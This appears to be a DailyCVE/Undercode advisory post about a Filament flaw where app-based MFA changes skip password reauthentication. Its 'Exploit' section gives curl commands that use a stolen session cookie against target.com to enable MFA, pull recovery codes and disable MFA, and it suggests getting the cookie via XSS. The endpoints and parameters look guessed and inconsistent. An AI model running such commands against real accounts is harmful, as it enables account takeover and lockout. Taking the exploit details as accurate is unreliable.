Filament, Multi-factor authentication (app) management actions do not require password reauthentication, CVE-2026-104181 (Moderate) -DC-Oct2026-2739

Listen to this Post

Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.13.3 and 5.8.3, app-based multi-factor authentication management actions do not consistently require confirmation of the current password. An attacker with access to an authenticated user session can set up app-based MFA and obtain recovery codes, or disable app-based MFA and regenerate recovery codes by supplying an existing app code or recovery code, without knowing the account password. Email-based MFA is not affected, and the issue does not independently permit an unauthenticated sign-in, but changing the app-MFA configuration may lock the legitimate user out. This issue is fixed in versions 4.13.3 and 5.8.3. The vulnerability is categorized under CWE-306, Missing Authentication for Critical Function. The CVSS 3.1 base score is 5.4, with a vector string of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L. The flaw lies in the validation logic governing app-based multi-factor authentication management endpoints, where the system accepts alternative forms of verification such as an existing valid TOTP code or a previously issued recovery code instead of requiring the primary account password. This design oversight effectively bypasses the intended layer of protection provided by the primary credential, reducing the strength of multi-factor authentication to single-factor verification in specific administrative contexts. An attacker with access to an authenticated user session can exploit this flaw to disable app-based MFA entirely or regenerate recovery codes without knowing the account password, potentially maintaining persistent access even if the legitimate user changes their password. Furthermore, because changing the app-MFA configuration may lock out the legitimate user, this vulnerability can also be leveraged maliciously to cause a denial of service against specific accounts. By disabling MFA or regenerating codes without proper authorization checks, an attacker ensures that only they retain access while locking out the rightful owner, effectively hijacking the account’s security posture and compromising its integrity. This vulnerability aligns with MITRE ATT&CK technique T1098, Account Manipulation, where attackers alter account credentials or configuration settings to maintain access and evade detection. The absence of password reauthentication for critical security setting changes creates a significant gap in access control mechanisms, allowing an attacker who has obtained valid session credentials to alter MFA configurations without possessing the actual user password.

DailyCVE Form:

Platform: Filament
Version: 4.0.0-4.13.2, 5.0.0-5.8.2
Vulnerability: MFA password bypass
Severity: Moderate
date: Sep 23, 2026

Prediction: Oct 5, 2026

What Undercode Say:

Analytics:

curl -X POST https://target.com/filament/mfa/app/setup \
-H “Cookie: session=authenticated_session_token” \
-d “action=enable”

Check for absence of password confirmation requirement

POST /filament/mfa/app/recovery-codes/regenerate

Host: target.com

Cookie: session=authenticated_session_token

Exploit: (Educational Purposes!)

Obtain authenticated session cookie (e.g., via XSS or session hijacking)

Enable app-based MFA without password

curl -X POST https://target.com/filament/mfa/app/setup \
-H “Cookie: session=stolen_session_cookie” \
-d “enable=true”

Retrieve recovery codes

curl https://target.com/filament/mfa/app/recovery-codes \
-H “Cookie: session=stolen_session_cookie”

Disable app-based MFA using existing TOTP code

curl -X POST https://target.com/filament/mfa/app/disable \
-H “Cookie: session=stolen_session_cookie” \
-d “code=123456”

Protection: from this CVE

Update to Filament version 4.13.3 or 5.8.3. Require current password confirmation for all app-based MFA management actions. Implement additional reauthentication checks for enabling MFA, disabling MFA, and regenerating recovery codes. Monitor for unauthorized MFA configuration changes.

Impact:

An attacker with access to an authenticated session can enable app-based MFA and obtain recovery codes without the user’s password, change the account’s MFA configuration, and potentially lock the legitimate user out. This can lead to account takeover persistence and denial of service for the legitimate account holder. The issue does not by itself allow an unauthenticated attacker to sign in.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top